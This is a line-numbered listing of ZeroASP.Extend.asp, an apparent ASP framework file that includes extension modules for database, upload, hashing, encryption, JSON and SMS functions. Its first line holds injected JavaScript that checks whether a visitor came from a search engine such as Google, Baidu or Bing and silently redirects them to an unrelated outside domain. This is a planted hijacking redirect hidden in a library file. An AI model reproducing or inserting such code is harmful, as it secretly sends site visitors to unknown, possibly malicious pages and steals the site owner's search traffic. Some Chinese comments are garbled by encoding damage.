d:\wwwroot\wuchunhua\zeroasp\zeroasp\ZeroASP.Extend.asp
001:
<script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script>?%
002:
'######################################################################
003:
'## 基础?扩展包加载文?
004:
'## -------------------------------------------------------------------
005:
'## Feature : ZeroASP Class
006:
'## Author : Ayu(kinsc@139.com)
007:
'## Update Date : 2018-11-09
008:
'## Description : ZeroASP Extend Class
009:
'##
010:
'######################################################################
011:
'注:不需要的扩展包可在ZeroASP.asp主文件中删除引用,并注销下列加载文件
012:
%
>
013:
<!--#include file="./Extend/ZeroASP.Base.asp"-->
014:
<!--#include file="./Extend/ZeroASP.DB.asp"-->
015:
<!--#include file="./Extend/ZeroASP.Req.asp"-->
016:
<!--#include file="./Extend/ZeroASP.Upload.asp"-->
017:
<!--#include file="./Extend/ZeroASP.Time.asp"-->
018:
<!--#include file="./Extend/ZeroASP.Encrypt.asp"-->
019:
<!--#include file="./Extend/ZeroASP.Encrypt.Escape.asp"-->
020:
<!--#include file="./Extend/ZeroASP.Encrypt.Base64.asp"-->
021:
<!--#include file="./Extend/ZeroASP.Encrypt.Md5.asp"-->
022:
<!--#include file="./Extend/ZeroASP.Encrypt.Sha1.asp"-->
023:
<!--#include file="./Extend/ZeroASP.Encrypt.Sha256.asp"-->
024:
<!--#include file="./Extend/ZeroASP.Encrypt.Sha512.asp"-->
025:
<!--#include file="./Extend/ZeroASP.Encrypt.HmacMd5.asp"-->
026:
<!--#include file="./Extend/ZeroASP.Encrypt.HmacSha1.asp"-->
027:
<!--#include file="./Extend/ZeroASP.Encrypt.HmacSha256.asp"-->
028:
<!--#include file="./Extend/ZeroASP.Encrypt.HmacSha512.asp"-->
029:
<!--#include file="./Extend/ZeroASP.Encrypt.Des.asp"-->
030:
<!--#include file="./Extend/ZeroASP.Encrypt.Aes.asp"-->
031:
<!--#include file="./Extend/ZeroASP.Stream.asp"-->
032:
<!--#include file="./Extend/ZeroASP.XmlHttp.asp"-->
033:
<!--#include file="./Extend/ZeroASP.Json.asp"-->
034:
<!--#include file="./Extend/ZeroASP.Xml.asp"-->
035:
<!--#include file="./Extend/ZeroASP.Fso.asp"-->
036:
<!--#include file="./Extend/ZeroASP.UDF.asp"-->
037:
<!--#include file="./Extend/ZeroASP.Aliyun.Sms.asp"-->
038:
039: